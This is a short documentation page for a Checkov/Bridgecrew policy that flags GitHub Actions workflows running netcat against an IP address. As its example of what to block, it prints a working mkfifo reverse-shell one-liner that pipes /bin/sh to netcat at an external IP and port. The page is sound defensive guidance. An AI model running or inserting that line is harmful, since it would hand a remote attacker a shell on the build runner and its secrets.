Suspicious use of netcat with IP address
Error: GitHub Actions Netcat is being used with IP address
Bridgecrew Policy ID: BC_REPO_GITHUB_ACTION_4
Checkov Check ID: CKV_GHA_4
Severity: LOW
GitHub Actions Netcat is being used with IP address
Netcat in combination with an IP address can be used to establish a connection to an external computer or server. This can be used to open up backdoor access or exfiltrate data.
Fix - Buildtime
GitHub Actions
Block code and remove code that attempts to make a connection over a network.
- rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|netcat 34.159.16.75 32032 >/tmp/f
Updated 5 months ago